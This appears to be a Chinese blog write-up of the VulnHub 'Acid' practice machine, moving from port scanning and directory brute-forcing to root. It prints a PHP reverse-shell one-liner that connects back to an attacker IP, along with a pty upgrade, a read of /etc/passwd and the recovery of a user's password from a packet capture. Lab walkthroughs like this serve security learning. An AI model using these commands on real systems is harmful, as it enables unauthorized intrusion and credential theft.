vulnhub--Acid

信息收集

主机发现

端口扫描

开放的端口为3347

浏览器访问

查看源码

最下面有一串字符

看来是让我们访问这个图片

下载查看这个图片,用hexdump查看,可以看到最后有一串字符,还不清楚它的用途

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

目录爆破

使用dirbuster 爆目录

分别访问include.php、cake.php、hacked.php

这个应该是登陆后才能访问,它显示有Magic_Box文件夹

发现这个页面可以输入命令

反弹Shell

尝试写一个shell

root@kali:~# nc -lvnp 4444

php -r '$sock=fsockopen("192.168.110.129",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

url编码后发送

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ su

su: must be run from a terminal

提示需要一个终端

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@acid:/var/www/html/Challenge/Magic_Box$

查看有哪些用户 cat /etc/passwd

acidsaman

查看用户文件

find / -user acid 2>/dev/null

/sbin/raw_vs_isi/hint.pcapng 是一个流量包,我们下载分析一波

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.110.131:/root/

在数据包中我们找到了saman用户的密码:1337hax0r

GETFLAG

先登陆saman用户

sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为"#"而不是"$"。想退回普通账户时可以执行"exit""logout"

sudo -i

出现的问题:

1dirbuster使用不熟练没有扫出和参考一至的内容一度陷入抓狂状态

2ssh远程传输文件因未安装ssh_server和未设置允许root账户连接而失败

反思:

1、工具一定要勤用,多试试其他方式

2、Linux的相关命令熟练程度有待提高

posted @ 2020-02-02 11:27  JKding233  阅读(283)  评论(0编辑  收藏  举报